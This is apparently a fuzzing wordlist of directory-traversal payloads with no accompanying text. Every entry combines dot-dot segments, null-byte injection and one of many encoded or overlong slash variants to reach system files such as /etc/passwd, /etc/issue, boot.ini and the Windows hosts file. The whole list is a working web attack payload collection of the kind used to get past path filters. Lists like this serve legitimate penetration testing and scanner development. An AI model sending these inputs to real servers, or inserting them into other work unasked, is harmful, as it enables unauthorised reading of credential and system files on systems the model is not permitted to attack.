-.%00.%c0%qf.%00.%c0%qf.%00.%c0%qf.%00.%c0%qfwindows%c0%qfsystem32%c0%qfdrivers%c0%qfetc%c0%qfhosts -.%00.%c0%qf.%00.%c0%qf.%00.%c0%qf.%00.%c0%qf.%00.%c0%qfetc%c0%qfpasswd -.%00.%c0%qf.%00.%c0%qf.%00.%c0%qf.%00.%c0%qf.%00.%c0%qfetc%c0%qfissue -.%00.%c0%qf.%00.%c0%qf.%00.%c0%qf.%00.%c0%qf.%00.%c0%qfboot.ini -.%00.%c0%qf.%00.%c0%qf.%00.%c0%qf.%00.%c0%qf.%00.%c0%qfwindows%c0%qfsystem32%c0%qfdrivers%c0%qfetc%c0%qfhosts -.%00.%c0%qf.%00.%c0%qf.%00.%c0%qf.%00.%c0%qf.%00.%c0%qf.%00.%c0%qfetc%c0%qfpasswd -.%00.%c0%qf.%00.%c0%qf.%00.%c0%qf.%00.%c0%qf.%00.%c0%qf.%00.%c0%qfetc%c0%qfissue -.%00.%c0%qf.%00.%c0%qf.%00.%c0%qf.%00.%c0%qf.%00.%c0%qf.%00.%c0%qfboot.ini -.%00.%c0%qf.%00.%c0%qf.%00.%c0%qf.%00.%c0%qf.%00.%c0%qf.%00.%c0%qfwindows%c0%qfsystem32%c0%qfdrivers%c0%qfetc%c0%qfhosts -.%00.%c1%8setc%c1%8spasswd -.%00.%c1%8setc%c1%8sissue -.%00.%c1%8sboot.ini -.%00.%c1%8swindows%c1%8ssystem32%c1%8sdrivers%c1%8setc%c1%8shosts -.%00.%c1%8s.%00.%c1%8setc%c1%8spasswd -.%00.%c1%8s.%00.%c1%8setc%c1%8sissue -.%00.%c1%8s.%00.%c1%8sboot.ini -.%00.%c1%8s.%00.%c1%8swindows%c1%8ssystem32%c1%8sdrivers%c1%8setc%c1%8shosts -.%00.%c1%8s.%00.%c1%8s.%00.%c1%8setc%c1%8spasswd -.%00.%c1%8s.%00.%c1%8s.%00.%c1%8setc%c1%8sissue -.%00.%c1%8s.%00.%c1%8s.%00.%c1%8sboot.ini -.%00.%c1%8s.%00.%c1%8s.%00.%c1%8swindows%c1%8ssystem32%c1%8sdrivers%c1%8setc%c1%8shosts -.%00.%c1%8s.%00.%c1%8s.%00.%c1%8s.%00.%c1%8setc%c1%8spasswd -.%00.%c1%8s.%00.%c1%8s.%00.%c1%8s.%00.%c1%8setc%c1%8sissue -.%00.%c1%8s.%00.%c1%8s.%00.%c1%8s.%00.%c1%8sboot.ini -.%00.%c1%8s.%00.%c1%8s.%00.%c1%8s.%00.%c1%8swindows%c1%8ssystem32%c1%8sdrivers%c1%8setc%c1%8shosts -.%00.%c1%8s.%00.%c1%8s.%00.%c1%8s.%00.%c1%8s.%00.%c1%8setc%c1%8spasswd -.%00.%c1%8s.%00.%c1%8s.%00.%c1%8s.%00.%c1%8s.%00.%c1%8setc%c1%8sissue -.%00.%c1%8s.%00.%c1%8s.%00.%c1%8s.%00.%c1%8s.%00.%c1%8sboot.ini -.%00.%c1%8s.%00.%c1%8s.%00.%c1%8s.%00.%c1%8s.%00.%c1%8swindows%c1%8ssystem32%c1%8sdrivers%c1%8setc%c1%8shosts -.%00.%c1%8s.%00.%c1%8s.%00.%c1%8s.%00.%c1%8s.%00.%c1%8s.%00.%c1%8setc%c1%8spasswd -.%00.%c1%8s.%00.%c1%8s.%00.%c1%8s.%00.%c1%8s.%00.%c1%8s.%00.%c1%8setc%c1%8sissue -.%00.%c1%8s.%00.%c1%8s.%00.%c1%8s.%00.%c1%8s.%00.%c1%8s.%00.%c1%8sboot.ini -.%00.%c1%8s.%00.%c1%8s.%00.%c1%8s.%00.%c1%8s.%00.%c1%8s.%00.%c1%8swindows%c1%8ssystem32%c1%8sdrivers%c1%8setc%c1%8shosts -.%00.%c1%1cetc%c1%1cpasswd -.%00.%c1%1cetc%c1%1cissue -.%00.%c1%1cboot.ini -.%00.%c1%1cwindows%c1%1csystem32%c1%1cdrivers%c1%1cetc%c1%1chosts -.%00.%c1%1c.%00.%c1%1cetc%c1%1cpasswd -.%00.%c1%1c.%00.%c1%1cetc%c1%1cissue -.%00.%c1%1c.%00.%c1%1cboot.ini -.%00.%c1%1c.%00.%c1%1cwindows%c1%1csystem32%c1%1cdrivers%c1%1cetc%c1%1chosts -.%00.%c1%1c.%00.%c1%1c.%00.%c1%1cetc%c1%1cpasswd -.%00.%c1%1c.%00.%c1%1c.%00.%c1%1cetc%c1%1cissue -.%00.%c1%1c.%00.%c1%1c.%00.%c1%1cboot.ini -.%00.%c1%1c.%00.%c1%1c.%00.%c1%1cwindows%c1%1csystem32%c1%1cdrivers%c1%1cetc%c1%1chosts -.%00.%c1%1c.%00.%c1%1c.%00.%c1%1c.%00.%c1%1cetc%c1%1cpasswd -.%00.%c1%1c.%00.%c1%1c.%00.%c1%1c.%00.%c1%1cetc%c1%1cissue -.%00.%c1%1c.%00.%c1%1c.%00.%c1%1c.%00.%c1%1cboot.ini -.%00.%c1%1c.%00.%c1%1c.%00.%c1%1c.%00.%c1%1cwindows%c1%1csystem32%c1%1cdrivers%c1%1cetc%c1%1chosts -.%00.%c1%1c.%00.%c1%1c.%00.%c1%1c.%00.%c1%1c.%00.%c1%1cetc%c1%1cpasswd -.%00.%c1%1c.%00.%c1%1c.%00.%c1%1c.%00.%c1%1c.%00.%c1%1cetc%c1%1cissue -.%00.%c1%1c.%00.%c1%1c.%00.%c1%1c.%00.%c1%1c.%00.%c1%1cboot.ini -.%00.%c1%1c.%00.%c1%1c.%00.%c1%1c.%00.%c1%1c.%00.%c1%1cwindows%c1%1csystem32%c1%1cdrivers%c1%1cetc%c1%1chosts -.%00.%c1%1c.%00.%c1%1c.%00.%c1%1c.%00.%c1%1c.%00.%c1%1c.%00.%c1%1cetc%c1%1cpasswd -.%00.%c1%1c.%00.%c1%1c.%00.%c1%1c.%00.%c1%1c.%00.%c1%1c.%00.%c1%1cetc%c1%1cissue -.%00.%c1%1c.%00.%c1%1c.%00.%c1%1c.%00.%c1%1c.%00.%c1%1c.%00.%c1%1cboot.ini -.%00.%c1%1c.%00.%c1%1c.%00.%c1%1c.%00.%c1%1c.%00.%c1%1c.%00.%c1%1cwindows%c1%1csystem32%c1%1cdrivers%c1%1cetc%c1%1chosts -.%00.%c1%afetc%c1%afpasswd -.%00.%c1%afetc%c1%afissue -.%00.%c1%afboot.ini -.%00.%c1%afwindows%c1%afsystem32%c1%afdrivers%c1%afetc%c1%afhosts -.%00.%c1%af.%00.%c1%afetc%c1%afpasswd -.%00.%c1%af.%00.%c1%afetc%c1%afissue -.%00.%c1%af.%00.%c1%afboot.ini -.%00.%c1%af.%00.%c1%afwindows%c1%afsystem32%c1%afdrivers%c1%afetc%c1%afhosts -.%00.%c1%af.%00.%c1%af.%00.%c1%afetc%c1%afpasswd -.%00.%c1%af.%00.%c1%af.%00.%c1%afetc%c1%afissue -.%00.%c1%af.%00.%c1%af.%00.%c1%afboot.ini -.%00.%c1%af.%00.%c1%af.%00.%c1%afwindows%c1%afsystem32%c1%afdrivers%c1%afetc%c1%afhosts -.%00.%c1%af.%00.%c1%af.%00.%c1%af.%00.%c1%afetc%c1%afpasswd -.%00.%c1%af.%00.%c1%af.%00.%c1%af.%00.%c1%afetc%c1%afissue -.%00.%c1%af.%00.%c1%af.%00.%c1%af.%00.%c1%afboot.ini -.%00.%c1%af.%00.%c1%af.%00.%c1%af.%00.%c1%afwindows%c1%afsystem32%c1%afdrivers%c1%afetc%c1%afhosts -.%00.%c1%af.%00.%c1%af.%00.%c1%af.%00.%c1%af.%00.%c1%afetc%c1%afpasswd -.%00.%c1%af.%00.%c1%af.%00.%c1%af.%00.%c1%af.%00.%c1%afetc%c1%afissue -.%00.%c1%af.%00.%c1%af.%00.%c1%af.%00.%c1%af.%00.%c1%afboot.ini -.%00.%c1%af.%00.%c1%af.%00.%c1%af.%00.%c1%af.%00.%c1%afwindows%c1%afsystem32%c1%afdrivers%c1%afetc%c1%afhosts -.%00.%c1%af.%00.%c1%af.%00.%c1%af.%00.%c1%af.%00.%c1%af.%00.%c1%afetc%c1%afpasswd -.%00.%c1%af.%00.%c1%af.%00.%c1%af.%00.%c1%af.%00.%c1%af.%00.%c1%afetc%c1%afissue -.%00.%c1%af.%00.%c1%af.%00.%c1%af.%00.%c1%af.%00.%c1%af.%00.%c1%afboot.ini -.%00.%c1%af.%00.%c1%af.%00.%c1%af.%00.%c1%af.%00.%c1%af.%00.%c1%afwindows%c1%afsystem32%c1%afdrivers%c1%afetc%c1%afhosts -.%00.%bg%qfetc%bg%qfpasswd -.%00.%bg%qfetc%bg%qfissue -.%00.%bg%qfboot.ini -.%00.%bg%qfwindows%bg%qfsystem32%bg%qfdrivers%bg%qfetc%bg%qfhosts -.%00.%bg%qf.%00.%bg%qfetc%bg%qfpasswd -.%00.%bg%qf.%00.%bg%qfetc%bg%qfissue -.%00.%bg%qf.%00.%bg%qfboot.ini -.%00.%bg%qf.%00.%bg%qfwindows%bg%qfsystem32%bg%qfdrivers%bg%qfetc%bg%qfhosts -.%00.%bg%qf.%00.%bg%qf.%00.%bg%qfetc%bg%qfpasswd -.%00.%bg%qf.%00.%bg%qf.%00.%bg%qfetc%bg%qfissue -.%00.%bg%qf.%00.%bg%qf.%00.%bg%qfboot.ini -.%00.%bg%qf.%00.%bg%qf.%00.%bg%qfwindows%bg%qfsystem32%bg%qfdrivers%bg%qfetc%bg%qfhosts -.%00.%bg%qf.%00.%bg%qf.%00.%bg%qf.%00.%bg%qfetc%bg%qfpasswd -.%00.%bg%qf.%00.%bg%qf.%00.%bg%qf.%00.%bg%qfetc%bg%qfissue -.%00.%bg%qf.%00.%bg%qf.%00.%bg%qf.%00.%bg%qfboot.ini -.%00.%bg%qf.%00.%bg%qf.%00.%bg%qf.%00.%bg%qfwindows%bg%qfsystem32%bg%qfdrivers%bg%qfetc%bg%qfhosts -.%00.%bg%qf.%00.%bg%qf.%00.%bg%qf.%00.%bg%qf.%00.%bg%qfetc%bg%qfpasswd -.%00.%bg%qf.%00.%bg%qf.%00.%bg%qf.%00.%bg%qf.%00.%bg%qfetc%bg%qfissue -.%00.%bg%qf.%00.%bg%qf.%00.%bg%qf.%00.%bg%qf.%00.%bg%qfboot.ini -.%00.%bg%qf.%00.%bg%qf.%00.%bg%qf.%00.%bg%qf.%00.%bg%qfwindows%bg%qfsystem32%bg%qfdrivers%bg%qfetc%bg%qfhosts -.%00.%bg%qf.%00.%bg%qf.%00.%bg%qf.%00.%bg%qf.%00.%bg%qf.%00.%bg%qfetc%bg%qfpasswd -.%00.%bg%qf.%00.%bg%qf.%00.%bg%qf.%00.%bg%qf.%00.%bg%qf.%00.%bg%qfetc%bg%qfissue -.%00.%bg%qf.%00.%bg%qf.%00.%bg%qf.%00.%bg%qf.%00.%bg%qf.%00.%bg%qfboot.ini -.%00.%bg%qf.%00.%bg%qf.%00.%bg%qf.%00.%bg%qf.%00.%bg%qf.%00.%bg%qfwindows%bg%qfsystem32%bg%qfdrivers%bg%qfetc%bg%qfhosts -.%00.%u2215etc%u2215passwd -.%00.%u2215etc%u2215issue -.%00.%u2215boot.ini -.%00.%u2215windows%u2215system32%u2215drivers%u2215etc%u2215hosts -.%00.%u2215.%00.%u2215etc%u2215passwd -.%00.%u2215.%00.%u2215etc%u2215issue -.%00.%u2215.%00.%u2215boot.ini -.%00.%u2215.%00.%u2215windows%u2215system32%u2215drivers%u2215etc%u2215hosts -.%00.%u2215.%00.%u2215.%00.%u2215etc%u2215passwd -.%00.%u2215.%00.%u2215.%00.%u2215etc%u2215issue -.%00.%u2215.%00.%u2215.%00.%u2215boot.ini -.%00.%u2215.%00.%u2215.%00.%u2215windows%u2215system32%u2215drivers%u2215etc%u2215hosts -.%00.%u2215.%00.%u2215.%00.%u2215.%00.%u2215etc%u2215passwd -.%00.%u2215.%00.%u2215.%00.%u2215.%00.%u2215etc%u2215issue -.%00.%u2215.%00.%u2215.%00.%u2215.%00.%u2215boot.ini -.%00.%u2215.%00.%u2215.%00.%u2215.%00.%u2215windows%u2215system32%u2215drivers%u2215etc%u2215hosts -.%00.%u2215.%00.%u2215.%00.%u2215.%00.%u2215.%00.%u2215etc%u2215passwd -.%00.%u2215.%00.%u2215.%00.%u2215.%00.%u2215.%00.%u2215etc%u2215issue -.%00.%u2215.%00.%u2215.%00.%u2215.%00.%u2215.%00.%u2215boot.ini -.%00.%u2215.%00.%u2215.%00.%u2215.%00.%u2215.%00.%u2215windows%u2215system32%u2215drivers%u2215etc%u2215hosts -.%00.%u2215.%00.%u2215.%00.%u2215.%00.%u2215.%00.%u2215.%00.%u2215etc%u2215passwd -.%00.%u2215.%00.%u2215.%00.%u2215.%00.%u2215.%00.%u2215.%00.%u2215etc%u2215issue -.%00.%u2215.%00.%u2215.%00.%u2215.%00.%u2215.%00.%u2215.%00.%u2215boot.ini -.%00.%u2215.%00.%u2215.%00.%u2215.%00.%u2215.%00.%u2215.%00.%u2215windows%u2215system32%u2215drivers%u2215etc%u2215hosts -.%00.%u2216etc%u2216passwd -.%00.%u2216etc%u2216issue -.%00.%u2216boot.ini -.%00.%u2216windows%u2216system32%u2216drivers%u2216etc%u2216hosts -.%00.%u2216.%00.%u2216etc%u2216passwd -.%00.%u2216.%00.%u2216etc%u2216issue -.%00.%u2216.%00.%u2216boot.ini -.%00.%u2216.%00.%u2216windows%u2216system32%u2216drivers%u2216etc%u2216hosts -.%00.%u2216.%00.%u2216.%00.%u2216etc%u2216passwd -.%00.%u2216.%00.%u2216.%00.%u2216etc%u2216issue -.%00.%u2216.%00.%u2216.%00.%u2216boot.ini -.%00.%u2216.%00.%u2216.%00.%u2216windows%u2216system32%u2216drivers%u2216etc%u2216hosts -.%00.%u2216.%00.%u2216.%00.%u2216.%00.%u2216etc%u2216passwd -.%00.%u2216.%00.%u2216.%00.%u2216.%00.%u2216etc%u2216issue -.%00.%u2216.%00.%u2216.%00.%u2216.%00.%u2216boot.ini -.%00.%u2216.%00.%u2216.%00.%u2216.%00.%u2216windows%u2216system32%u2216drivers%u2216etc%u2216hosts -.%00.%u2216.%00.%u2216.%00.%u2216.%00.%u2216.%00.%u2216etc%u2216passwd -.%00.%u2216.%00.%u2216.%00.%u2216.%00.%u2216.%00.%u2216etc%u2216issue -.%00.%u2216.%00.%u2216.%00.%u2216.%00.%u2216.%00.%u2216boot.ini -.%00.%u2216.%00.%u2216.%00.%u2216.%00.%u2216.%00.%u2216windows%u2216system32%u2216drivers%u2216etc%u2216hosts -.%00.%u2216.%00.%u2216.%00.%u2216.%00.%u2216.%00.%u2216.%00.%u2216etc%u2216passwd -.%00.%u2216.%00.%u2216.%00.%u2216.%00.%u2216.%00.%u2216.%00.%u2216etc%u2216issue -.%00.%u2216.%00.%u2216.%00.%u2216.%00.%u2216.%00.%u2216.%00.%u2216boot.ini -.%00.%u2216.%00.%u2216.%00.%u2216.%00.%u2216.%00.%u2216.%00.%u2216windows%u2216system32%u2216drivers%u2216etc%u2216hosts -.%00.%uEFC8etc%uEFC8passwd -.%00.%uEFC8etc%uEFC8issue -.%00.%uEFC8boot.ini -.%00.%uEFC8windows%uEFC8system32%uEFC8drivers%uEFC8etc%uEFC8hosts -.%00.%uEFC8.%00.%uEFC8etc%uEFC8passwd -.%00.%uEFC8.%00.%uEFC8etc%uEFC8issue -.%00.%uEFC8.%00.%uEFC8boot.ini -.%00.%uEFC8.%00.%uEFC8windows%uEFC8system32%uEFC8drivers%uEFC8etc%uEFC8hosts -.%00.%uEFC8.%00.%uEFC8.%00.%uEFC8etc%uEFC8passwd -.%00.%uEFC8.%00.%uEFC8.%00.%uEFC8etc%uEFC8issue -.%00.%uEFC8.%00.%uEFC8.%00.%uEFC8boot.ini -.%00.%uEFC8.%00.%uEFC8.%00.%uEFC8windows%uEFC8system32%uEFC8drivers%uEFC8etc%uEFC8hosts -.%00.%uEFC8.%00.%uEFC8.%00.%uEFC8.%00.%uEFC8etc%uEFC8passwd -.%00.%uEFC8.%00.%uEFC8.%00.%uEFC8.%00.%uEFC8etc%uEFC8issue -.%00.%uEFC8.%00.%uEFC8.%00.%uEFC8.%00.%uEFC8boot.ini -.%00.%uEFC8.%00.%uEFC8.%00.%uEFC8.%00.%uEFC8windows%uEFC8system32%uEFC8drivers%uEFC8etc%uEFC8hosts -.%00.%uEFC8.%00.%uEFC8.%00.%uEFC8.%00.%uEFC8.%00.%uEFC8etc%uEFC8passwd -.%00.%uEFC8.%00.%uEFC8.%00.%uEFC8.%00.%uEFC8.%00.%uEFC8etc%uEFC8issue -.%00.%uEFC8.%00.%uEFC8.%00.%uEFC8.%00.%uEFC8.%00.%uEFC8boot.ini -.%00.%uEFC8.%00.%uEFC8.%00.%uEFC8.%00.%uEFC8.%00.%uEFC8windows%uEFC8system32%uEFC8drivers%uEFC8etc%uEFC8hosts -.%00.%uEFC8.%00.%uEFC8.%00.%uEFC8.%00.%uEFC8.%00.%uEFC8.%00.%uEFC8etc%uEFC8passwd -.%00.%uEFC8.%00.%uEFC8.%00.%uEFC8.%00.%uEFC8.%00.%uEFC8.%00.%uEFC8etc%uEFC8issue -.%00.%uEFC8.%00.%uEFC8.%00.%uEFC8.%00.%uEFC8.%00.%uEFC8.%00.%uEFC8boot.ini -.%00.%uEFC8.%00.%uEFC8.%00.%uEFC8.%00.%uEFC8.%00.%uEFC8.%00.%uEFC8windows%uEFC8system32%uEFC8drivers%uEFC8etc%uEFC8hosts -.%00.%uF025etc%uF025passwd -.%00.%uF025etc%uF025issue -.%00.%uF025boot.ini -.%00.%uF025windows%uF025system32%uF025drivers%uF025etc%uF025hosts -.%00.%uF025.%00.%uF025etc%uF025passwd -.%00.%uF025.%00.%uF025etc%uF025issue -.%00.%uF025.%00.%uF025boot.ini -.%00.%uF025.%00.%uF025windows%uF025system32%uF025drivers%uF025etc%uF025hosts -.%00.%uF025.%00.%uF025.%00.%uF025etc%uF025passwd -.%00.%uF025.%00.%uF025.%00.%uF025etc%uF025issue -.%00.%uF025.%00.%uF025.%00.%uF025boot.ini -.%00.%uF025.%00.%uF025.%00.%uF025windows%uF025system32%uF025drivers%uF025etc%uF025hosts -.%00.%uF025.%00.%uF025.%00.%uF025.%00.%uF025etc%uF025passwd -.%00.%uF025.%00.%uF025.%00.%uF025.%00.%uF025etc%uF025issue -.%00.%uF025.%00.%uF025.%00.%uF025.%00.%uF025boot.ini -.%00.%uF025.%00.%uF025.%00.%uF025.%00.%uF025windows%uF025system32%uF025drivers%uF025etc%uF025hosts -.%00.%uF025.%00.%uF025.%00.%uF025.%00.%uF025.%00.%uF025etc%uF025passwd -.%00.%uF025.%00.%uF025.%00.%uF025.%00.%uF025.%00.%uF025etc%uF025issue -.%00.%uF025.%00.%uF025.%00.%uF025.%00.%uF025.%00.%uF025boot.ini -.%00.%uF025.%00.%uF025.%00.%uF025.%00.%uF025.%00.%uF025windows%uF025system32%uF025drivers%uF025etc%uF025hosts -.%00.%uF025.%00.%uF025.%00.%uF025.%00.%uF025.%00.%uF025.%00.%uF025etc%uF025passwd -.%00.%uF025.%00.%uF025.%00.%uF025.%00.%uF025.%00.%uF025.%00.%uF025etc%uF025issue -.%00.%uF025.%00.%uF025.%00.%uF025.%00.%uF025.%00.%uF025.%00.%uF025boot.ini -.%00.%uF025.%00.%uF025.%00.%uF025.%00.%uF025.%00.%uF025.%00.%uF025windows%uF025system32%uF025drivers%uF025etc%uF025hosts -.%00.%%32%%66etc%%32%%66passwd -.%00.%%32%%66etc%%32%%66issue -.%00.%%32%%66boot.ini -.%00.%%32%%66windows%%32%%66system32%%32%%66drivers%%32%%66etc%%32%%66hosts -.%00.%%32%%66.%00.%%32%%66etc%%32%%66passwd -.%00.%%32%%66.%00.%%32%%66etc%%32%%66issue -.%00.%%32%%66.%00.%%32%%66boot.ini -.%00.%%32%%66.%00.%%32%%66windows%%32%%66system32%%32%%66drivers%%32%%66etc%%32%%66hosts -.%00.%%32%%66.%00.%%32%%66.%00.%%32%%66etc%%32%%66passwd -.%00.%%32%%66.%00.%%32%%66.%00.%%32%%66etc%%32%%66issue -.%00.%%32%%66.%00.%%32%%66.%00.%%32%%66boot.ini -.%00.%%32%%66.%00.%%32%%66.%00.%%32%%66windows%%32%%66system32%%32%%66drivers%%32%%66etc%%32%%66hosts -.%00.%%32%%66.%00.%%32%%66.%00.%%32%%66.%00.%%32%%66etc%%32%%66passwd -.%00.%%32%%66.%00.%%32%%66.%00.%%32%%66.%00.%%32%%66etc%%32%%66issue -.%00.%%32%%66.%00.%%32%%66.%00.%%32%%66.%00.%%32%%66boot.ini -.%00.%%32%%66.%00.%%32%%66.%00.%%32%%66.%00.%%32%%66windows%%32%%66system32%%32%%66drivers%%32%%66etc%%32%%66hosts -.%00.%%32%%66.%00.%%32%%66.%00.%%32%%66.%00.%%32%%66.%00.%%32%%66etc%%32%%66passwd -.%00.%%32%%66.%00.%%32%%66.%00.%%32%%66.%00.%%32%%66.%00.%%32%%66etc%%32%%66issue -.%00.%%32%%66.%00.%%32%%66.%00.%%32%%66.%00.%%32%%66.%00.%%32%%66boot.ini -.%00.%%32%%66.%00.%%32%%66.%00.%%32%%66.%00.%%32%%66.%00.%%32%%66windows%%32%%66system32%%32%%66drivers%%32%%66etc%%32%%66hosts -.%00.%%32%%66.%00.%%32%%66.%00.%%32%%66.%00.%%32%%66.%00.%%32%%66.%00.%%32%%66etc%%32%%66passwd -.%00.%%32%%66.%00.%%32%%66.%00.%%32%%66.%00.%%32%%66.%00.%%32%%66.%00.%%32%%66etc%%32%%66issue -.%00.%%32%%66.%00.%%32%%66.%00.%%32%%66.%00.%%32%%66.%00.%%32%%66.%00.%%32%%66boot.ini -.%00.%%32%%66.%00.%%32%%66.%00.%%32%%66.%00.%%32%%66.%00.%%32%%66.%00.%%32%%66windows%%32%%66system32%%32%%66drivers%%32%%66etc%%32%%66hosts -.%00.%%35%%63etc%%35%%63passwd -.%00.%%35%%63etc%%35%%63issue -.%00.%%35%%63boot.ini -.%00.%%35%%63windows%%35%%63system32%%35%%63drivers%%35%%63etc%%35%%63hosts -.%00.%%35%%63.%00.%%35%%63etc%%35%%63passwd -.%00.%%35%%63.%00.%%35%%63etc%%35%%63issue -.%00.%%35%%63.%00.%%35%%63boot.ini -.%00.%%35%%63.%00.%%35%%63windows%%35%%63system32%%35%%63drivers%%35%%63etc%%35%%63hosts -.%00.%%35%%63.%00.%%35%%63.%00.%%35%%63etc%%35%%63passwd -.%00.%%35%%63.%00.%%35%%63.%00.%%35%%63etc%%35%%63issue -.%00.%%35%%63.%00.%%35%%63.%00.%%35%%63boot.ini -.%00.%%35%%63.%00.%%35%%63.%00.%%35%%63windows%%35%%63system32%%35%%63drivers%%35%%63etc%%35%%63hosts -.%00.%%35%%63.%00.%%35%%63.%00.%%35%%63.%00.%%35%%63etc%%35%%63passwd -.%00.%%35%%63.%00.%%35%%63.%00.%%35%%63.%00.%%35%%63etc%%35%%63issue -.%00.%%35%%63.%00.%%35%%63.%00.%%35%%63.%00.%%35%%63boot.ini -.%00.%%35%%63.%00.%%35%%63.%00.%%35%%63.%00.%%35%%63windows%%35%%63system32%%35%%63drivers%%35%%63etc%%35%%63hosts -.%00.%%35%%63.%00.%%35%%63.%00.%%35%%63.%00.%%35%%63.%00.%%35%%63etc%%35%%63passwd -.%00.%%35%%63.%00.%%35%%63.%00.%%35%%63.%00.%%35%%63.%00.%%35%%63etc%%35%%63issue -.%00.%%35%%63.%00.%%35%%63.%00.%%35%%63.%00.%%35%%63.%00.%%35%%63boot.ini -.%00.%%35%%63.%00.%%35%%63.%00.%%35%%63.%00.%%35%%63.%00.%%35%%63windows%%35%%63system32%%35%%63drivers%%35%%63etc%%35%%63hosts -.%00.%%35%%63.%00.%%35%%63.%00.%%35%%63.%00.%%35%%63.%00.%%35%%63.%00.%%35%%63etc%%35%%63passwd -.%00.%%35%%63.%00.%%35%%63.%00.%%35%%63.%00.%%35%%63.%00.%%35%%63.%00.%%35%%63etc%%35%%63issue -.%00.%%35%%63.%00.%%35%%63.%00.%%35%%63.%00.%%35%%63.%00.%%35%%63.%00.%%35%%63boot.ini -.%00.%%35%%63.%00.%%35%%63.%00.%%35%%63.%00.%%35%%63.%00.%%35%%63.%00.%%35%%63windows%%35%%63system32%%35%%63drivers%%35%%63etc%%35%%63hosts -.%00.%e0%80%afetc%e0%80%afpasswd -.%00.%e0%80%afetc%e0%80%afissue -.%00.%e0%80%afboot.ini -.%00.%e0%80%afwindows%e0%80%afsystem32%e0%80%afdrivers%e0%80%afetc%e0%80%afhosts -.%00.%e0%80%af.%00.%e0%80%afetc%e0%80%afpasswd -.%00.%e0%80%af.%00.%e0%80%afetc%e0%80%afissue -.%00.%e0%80%af.%00.%e0%80%afboot.ini -.%00.%e0%80%af.%00.%e0%80%afwindows%e0%80%afsystem32%e0%80%afdrivers%e0%80%afetc%e0%80%afhosts -.%00.%e0%80%af.%00.%e0%80%af.%00.%e0%80%afetc%e0%80%afpasswd -.%00.%e0%80%af.%00.%e0%80%af.%00.%e0%80%afetc%e0%80%afissue -.%00.%e0%80%af.%00.%e0%80%af.%00.%e0%80%afboot.ini -.%00.%e0%80%af.%00.%e0%80%af.%00.%e0%80%afwindows%e0%80%afsystem32%e0%80%afdrivers%e0%80%afetc%e0%80%afhosts -.%00.%e0%80%af.%00.%e0%80%af.%00.%e0%80%af.%00.%e0%80%afetc%e0%80%afpasswd -.%00.%e0%80%af.%00.%e0%80%af.%00.%e0%80%af.%00.%e0%80%afetc%e0%80%afissue -.%00.%e0%80%af.%00.%e0%80%af.%00.%e0%80%af.%00.%e0%80%afboot.ini -.%00.%e0%80%af.%00.%e0%80%af.%00.%e0%80%af.%00.%e0%80%afwindows%e0%80%afsystem32%e0%80%afdrivers%e0%80%afetc%e0%80%afhosts -.%00.%e0%80%af.%00.%e0%80%af.%00.%e0%80%af.%00.%e0%80%af.%00.%e0%80%afetc%e0%80%afpasswd -.%00.%e0%80%af.%00.%e0%80%af.%00.%e0%80%af.%00.%e0%80%af.%00.%e0%80%afetc%e0%80%afissue -.%00.%e0%80%af.%00.%e0%80%af.%00.%e0%80%af.%00.%e0%80%af.%00.%e0%80%afboot.ini -.%00.%e0%80%af.%00.%e0%80%af.%00.%e0%80%af.%00.%e0%80%af.%00.%e0%80%afwindows%e0%80%afsystem32%e0%80%afdrivers%e0%80%afetc%e0%80%afhosts -.%00.%e0%80%af.%00.%e0%80%af.%00.%e0%80%af.%00.%e0%80%af.%00.%e0%80%af.%00.%e0%80%afetc%e0%80%afpasswd -.%00.%e0%80%af.%00.%e0%80%af.%00.%e0%80%af.%00.%e0%80%af.%00.%e0%80%af.%00.%e0%80%afetc%e0%80%afissue -.%00.%e0%80%af.%00.%e0%80%af.%00.%e0%80%af.%00.%e0%80%af.%00.%e0%80%af.%00.%e0%80%afboot.ini -.%00.%e0%80%af.%00.%e0%80%af.%00.%e0%80%af.%00.%e0%80%af.%00.%e0%80%af.%00.%e0%80%afwindows%e0%80%afsystem32%e0%80%afdrivers%e0%80%afetc%e0%80%afhosts -.%00.%25c1%259cetc%25c1%259cpasswd -.%00.%25c1%259cetc%25c1%259cissue -.%00.%25c1%259cboot.ini -.%00.%25c1%259cwindows%25c1%259csystem32%25c1%259cdrivers%25c1%259cetc%25c1%259chosts -.%00.%25c1%259c.%00.%25c1%259cetc%25c1%259cpasswd -.%00.%25c1%259c.%00.%25c1%259cetc%25c1%259cissue -.%00.%25c1%259c.%00.%25c1%259cboot.ini -.%00.%25c1%259c.%00.%25c1%259cwindows%25c1%259csystem32%25c1%259cdrivers%25c1%259cetc%25c1%259chosts -.%00.%25c1%259c.%00.%25c1%259c.%00.%25c1%259cetc%25c1%259cpasswd -.%00.%25c1%259c.%00.%25c1%259c.%00.%25c1%259cetc%25c1%259cissue -.%00.%25c1%259c.%00.%25c1%259c.%00.%25c1%259cboot.ini -.%00.%25c1%259c.%00.%25c1%259c.%00.%25c1%259cwindows%25c1%259csystem32%25c1%259cdrivers%25c1%259cetc%25c1%259chosts -.%00.%25c1%259c.%00.%25c1%259c.%00.%25c1%259c.%00.%25c1%259cetc%25c1%259cpasswd -.%00.%25c1%259c.%00.%25c1%259c.%00.%25c1%259c.%00.%25c1%259cetc%25c1%259cissue -.%00.%25c1%259c.%00.%25c1%259c.%00.%25c1%259c.%00.%25c1%259cboot.ini -.%00.%25c1%259c.%00.%25c1%259c.%00.%25c1%259c.%00.%25c1%259cwindows%25c1%259csystem32%25c1%259cdrivers%25c1%259cetc%25c1%259chosts -.%00.%25c1%259c.%00.%25c1%259c.%00.%25c1%259c.%00.%25c1%259c.%00.%25c1%259cetc%25c1%259cpasswd -.%00.%25c1%259c.%00.%25c1%259c.%00.%25c1%259c.%00.%25c1%259c.%00.%25c1%259cetc%25c1%259cissue -.%00.%25c1%259c.%00.%25c1%259c.%00.%25c1%259c.%00.%25c1%259c.%00.%25c1%259cboot.ini -.%00.%25c1%259c.%00.%25c1%259c.%00.%25c1%259c.%00.%25c1%259c.%00.%25c1%259cwindows%25c1%259csystem32%25c1%259cdrivers%25c1%259cetc%25c1%259chosts -.%00.%25c1%259c.%00.%25c1%259c.%00.%25c1%259c.%00.%25c1%259c.%00.%25c1%259c.%00.%25c1%259cetc%25c1%259cpasswd -.%00.%25c1%259c.%00.%25c1%259c.%00.%25c1%259c.%00.%25c1%259c.%00.%25c1%259c.%00.%25c1%259cetc%25c1%259cissue -.%00.%25c1%259c.%00.%25c1%259c.%00.%25c1%259c.%00.%25c1%259c.%00.%25c1%259c.%00.%25c1%259cboot.ini 